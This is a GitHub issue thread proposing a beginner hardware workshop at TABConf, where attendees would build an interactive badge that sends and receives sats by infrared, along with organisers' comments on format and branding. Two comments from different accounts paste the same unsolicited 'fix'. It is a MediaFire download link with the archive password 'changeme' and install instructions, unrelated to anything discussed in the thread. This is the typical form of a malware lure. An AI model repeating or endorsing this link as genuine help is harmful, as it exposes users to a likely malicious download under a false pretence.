### ISSUE TITLE
Building an interactive Bitcoin Hacker Badge. While supplies last.

### ISSUE THREAD

**Issue by miketwenty1** [TABConf/6.tabconf.com#106]
# Description
### What is this workshop about? Provide as many details as possible. 
Build an interactive fun badge that can send and receive sats with infrared. 

### What would an attendee learn from this workshop?
Small computer hardware concepts. Some lightning concepts.

### Is there anything attendees should read up on before they attend this talk?
TBD

### Is there anything attendees should set up before the workshop?
Shouldn't be, but TBD.

### Relevant Links
TBD

 
# Level of difficulty 
 
Beginner

# About the Speaker
Ben Arc @arcbtc to ACK and make sure he can do this.

### Social Links
Github 
Twitter
Website

# Workshop Details
### Length of workshop
2 hours

### Preferred Day/Time Slot 
Day 1 (To give more time to play with it, in case teams want to include it in their hackathon projects)

*We will do our best to accommodate your requested time slot. Please let us know if there are any dates/times that ***absolutely do not work*** for you.*

**Comment by miketwenty1** [comment]
We need to decide if this should be a dedicated workshop in a workshop room, or if we just facilitate 1 or 2 times for people to get extra help at a builders day badge builder area.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by michaesc** [comment]
The badge will be TABConf branded without any reference to Bitcoin. It's possible that Ben or others implement some bitcoin logic on the badge, is that the reason this project is prominently labeled as a Bitcoin one?

**Comment by iglesiasbrandon** [comment]
Thank you for hosting this!
